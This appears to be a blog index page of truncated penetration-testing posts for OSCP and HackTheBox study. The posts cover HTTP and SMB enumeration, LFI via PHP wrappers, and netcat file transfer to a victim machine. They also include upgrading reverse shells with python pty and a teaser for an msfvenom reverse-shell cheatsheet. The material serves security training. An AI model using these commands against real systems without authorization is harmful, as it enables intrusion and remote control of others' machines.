Enumerating HTTP Ports (80, 443, 8080, etc.)

When enumerating, we want to be able to identify the software/versions that are fulfilling the following roles. This document intends to serve as a guide for hunting for the answers. Web Application – WordPress, CMS, Drupal, etc. Web Technologies – Node.js, PHP, Java, etc. Web Server – Apache, IIS, Nginx, etc. Database – MySQL, MariaDB, […]

Setting Up BurpSuite

Once Burp loads up, there are a few things we need to configure to make our lives easier. Installing and Configuring FoxyProxy First, to make our lives easier, let’s install the Firefox add-in for FoxyProxy. With the add-in installed, let’s head into the Options. Now we can Add a new entry. Let’s create the New […]

Enumerating SMB for Pentesting (Ports 445, 139)

Using NMAP Scan for popular RCE exploits. sudo nmap -p 139,445 --script smb-vuln* <ip-addr> -oA nmap/smb-vuln Identify the SMB/OS version. nmap -v -p 139,445 --script=smb-os-discovery.nse <ip-addr> Using SMBCLIENT To list out the shares: smbclient -L \\\\<ip-addr> To connect to shares: sudo smbclient \\\\<ip-addr>\\<share> Downloading files: Once connected, you can download files. You’ll want to disable […]

File Transfer in Linux: Uploading & Executing in Memory

This example will show us uploading to a victim machine and executing the file straight into memory so that we write nothing to the hard-drive. On our attacking box, find the executable you wish to transfer and run the following command: cat <filename> | nc -nvlp 9002 On the victim machine, change into the […]

Using PHP Wrappers within LFI to Obtain PHP Script Source Code

If you find a Local File Inclusion (LFI) in an application running PHP, you can leverage a PHP wrapper to convert the file to Base64, which you can then decode on your own machine to view the source code of the page. In this example, we’ll be using FRIENDZONE on HackTheBox. Confirming LFI on our example At the following […]

Transferring Files via Base64

Depending on the size of the file, you may not want to go through the hassle of transferring it via Netcat, FTP, or some other file transfer method. In some cases, you can convert a file to Base64 code, and then simply copy/paste the code between the machines. We’ll do that here. There is a […]

Upgrading Simple Shells to Interactive TTYs w/ Python

This is a quick and easy post, mainly for my own reference moving forward. It will showcase how to upgrade and improve your reverse shells so that they are more user friendly. Once you have a reverse shell, start by running the command python -c 'import pty;pty.spawn("/bin/bash")' Now we’ll background the window with Ctrl + […]

Tmux Cheatsheet for Splitting Terminal Panes and More

Note: <PrefixKey> by default is Ctrl + B Creating Tmux Sessions and Windows tmux new -s Example Create a new tmux session titled “Example” <PrefixKey> + C Create a new window within the session <PrefixKey> + Number Take you to your different windows. Windows are identified by the banner down below. <PrefixKey> + , Rename […]

Hacking Methodology Cheatsheet

This post is going to contain a list of common tools, vulnerabilities, & methodology tactics broken down by category and contains links to references that will showcase examples. This document will be updated often as I work through more and more resources. Enumerating Common Services Enumerating SMB 139,445 Using smbmap and smbclient to crawl and […]

Unzipping Rockyou.txt.gz in Kali Linux

Stupid simple post. Creating this as I never remember the syntax and have to look it up each time I spin up a new VM. Posting the command here for my own personal gain in the future. sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)

There are tons of cheatsheets out there, but I couldn’t find a comprehensive one that includes non-Meterpreter shells. I will include both Meterpreter, as well as non-Meterpreter shells for those studying for OSCP. Table of Contents: Non-Meterpreter Binaries; Non-Meterpreter Web Payloads; Meterpreter Binaries; Meterpreter Web Payloads. Non-Meterpreter Binaries: Staged Payloads for Windows x86 […]

